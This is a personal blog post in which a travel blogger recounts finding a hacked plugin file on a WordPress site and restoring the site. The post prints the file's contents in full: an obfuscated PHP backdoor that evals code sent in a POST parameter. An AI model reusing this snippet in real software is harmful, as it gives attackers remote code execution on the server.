I might not update much anymore, but I still want the blog to remain as a record of my travels. This afternoon I got an email from 1and1, my webhost, telling me that the following file was “under attack” –
~/blog/wp-content/plugins/health-check/code.php
I was surprised, and immediately went into my SFTP client to download and check the file. It was an old plugin, I must have installed it as part of the PHP4 -> 5 changeover I did sometime while I was in Jordan to see what version was being reported. Tellingly, the plugin had never been updated, and I can’t seem to find it anymore in WordPress’s extension/plugin repository (although maybe this is it, as it’s named health-check in their database).
More chillingly, viewing the website in a browser yielded an error pertaining to my wp-includes folder, a settings file, that was no longer functioning. White screen; that’s it.
When I tried to download code.php to my computer to inspect it, Windows Defender immediately flagged the file as malware and deleted. Since I was on my work machine at the time, I had to talk to my colleague next door (who runs our antivirus scanner) to unblock the file! It was gobbledegook anyway – here’s what was inside it:
<?php $scol4 =”t_psroue” ; $fcen0= $scol4[3]. $scol4[0].$scol4[4]. $scol4[0].$scol4[5].$scol4[6]. $scol4[2]. $scol4[2].$scol4[7]. $scol4[4]; $jphf86 =$fcen0 ( $scol4[1].$scol4[2].$scol4[5].$scol4[3]. $scol4[0] ) ; if ( isset( ${ $jphf86 }[‘qd6e706’ ]) ) { eval ( ${ $jphf86}[ ‘qd6e706’]); }?>
Anyway, using this thread here, the easy fix was just to entirely purge the wp-admin and wp-include folders and replace them with fresh downloads from wordpress.org. Once I did that, everything started working again. But it was quite a scare, especially since I cheaped out with 1and1 last year when they begged me to upgrade from my $4 a month hosting to something with backup capability. I run my own backups…sometimes. Heh. Guess I should do that now.
Update, June 6th – Found it. It’s almost positive that this was the cause of one of the infection, as today I was notified of flaws in the WP-Mobile-Detector plugin. I applied the patch right away, although weirdly enough it still shows the “last modified” date for the resize.php file as being February 2016, not June.
No one has commented on this post - please leave me one, I love getting feedback!